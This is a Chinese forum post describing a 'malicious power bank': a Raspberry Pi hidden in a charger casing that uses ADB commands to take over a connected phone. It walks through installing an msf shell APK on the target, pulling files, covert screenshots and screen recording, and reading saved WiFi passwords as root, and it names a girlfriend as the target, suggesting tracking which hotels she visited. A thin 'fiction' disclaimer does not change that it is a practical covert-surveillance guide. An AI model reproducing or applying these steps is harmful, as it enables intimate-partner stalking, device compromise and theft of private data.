找回密码
 注册

QQ登录

只需一步,快速开始

前言
本学习纯属虚构,里面涉及到的思路仅供吹牛。请勿非法使用,造成法律后果请自负!
什么是恶意充电宝
准备
  • 树莓派(虚拟机下没有尝试,因为需要安装手机的驱动。理论上应该也是可以的。)
  • 充电宝外壳(有条件的可以尝试利用3D打印,自己做一个外壳。)
    -数据线
安装ADB
在树莓派中执行
  1. <font color="rgb(240, 141, 73)">apt-get</font> <font color="rgb(240, 141, 73)">install</font> adb
复制代码

如果失败,请更新你的源为国内阿里云或中科大的源。
验证在终端中输入adb如下,则证明安装完成。
adb
配置手机
在设置中开启开发者选项—USB试调即可。
开始测试
将手机和树莓派用数据线连接

这里提示是在充电,我们来看看在不知不觉中我们是如何进入手机的。
终端执行
  1. adb devices
复制代码


其中34fb90f30704 device就是我们刚才连接的手机。
比如这时想指定 34fb90f30704 这个设备来运行 adb 命令获取屏幕分辨率:
  1. adb -s 34fb90f30704 shell wm size
复制代码

分辨率.png
显示手机中的所有应用
  1. adb shell pm list packages
复制代码


其他命令参见列表

安装apk
利用这个功能,我们可以把msfShell安装到我们的目标手机,方便我们测试!
命令格式:
  1. adb <font color="rgb(240, 141, 73)">install</font> <font color="rgb(204, 204, 204)">[</font>-lrtsdg <font color="rgb(103, 205, 204)"><</font>path_to_apk<font color="rgb(103, 205, 204)">></font>
复制代码


参数:
adb install 后面可以跟一些可选参数来控制安装 APK 的行为,可用参数及含义如下:

如:adb install -g /root/11.apk
效果如下:

文件管理复制设备里的文件到电脑
命令:
  1. adb pull <font color="rgb(103, 205, 204)"><</font>设备里的文件路径<font color="rgb(103, 205, 204)">></font> <font color="rgb(204, 204, 204)">[</font>电脑上的目录
复制代码




其中 电脑上的目录 参数可以省略,默认复制到当前目录。
例:
  1. adb pull /sdcard/sr.mp4 ~/tmp/
复制代码



小技巧:设备上的文件路径可能需要 root 权限才能访问,如果你的设备已经 root 过,可以先使用 adb shell 和 su 命令在 adb shell 里获取 root 权限后,先 cp /path/on/device /sdcard/filename 将文件复制到 sdcard,然后 adb pull /sdcard/filename /path/on/pc。
复制电脑里的文件到设备
命令:
  1. adb push <font color="rgb(103, 205, 204)"><</font>电脑上的文件路径<font color="rgb(103, 205, 204)">></font> <font color="rgb(103, 205, 204)"><</font>设备里的目录<font color="rgb(103, 205, 204)">></font>
复制代码



例:
  1. adb push ~/sr.mp4 /sdcard/
复制代码

查看手机电池情况
  1. adb shell dumpsys battery
复制代码


其中 scale 代表最大电量,level 代表当前电量。
屏幕截图
感觉这个功能很实用,很隐蔽。
  1. adb exec-out screencap -p <font color="rgb(103, 205, 204)">></font> bbskali.png
复制代码

我们利用vnc登录,查看效果。
目标手机的截图
录制屏幕
录制屏幕以 mp4 格式保存到 /sdcard:
  1. adb shell screenrecord /sdcard/filename.mp4
复制代码

需要停止时按 Ctrl-C,默认录制时间和最长录制时间都是 180 秒。
如果需要导出到电脑:
  1. adb pull /sdcard/filename.mp4
复制代码
查看连接过的 WiFi 密码
注:需要 root 权限。
命令:
  1. adb shell<font color="rgb(240, 141, 73)">su</font><font color="rgb(240, 141, 73)">cat</font> /data/misc/wifi/*.conf
复制代码

利用这个命令,我们还可以看看女盆去过那个宾馆或酒店。毕竟都会默默的连WIFI
好了,其他的一些adb命令,你们自己搜索去玩吧。这里不再演示了!
伪装
现在最重要的问题是,如何让女盆把手机和树莓派连接。我这里的思路是将树莓派放到充电宝的盒子中,并且由充电宝为树莓派提供电源。

最后,找个外壳放到里面即可。



我知道答案 本帖寻求最佳答案回答被采纳后将获得系统奖励10 金币 , 目前已有0人回答
分享至 : QQ空间
收藏
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴

0 个回复

您需要登录后才可以回帖 登录 | 注册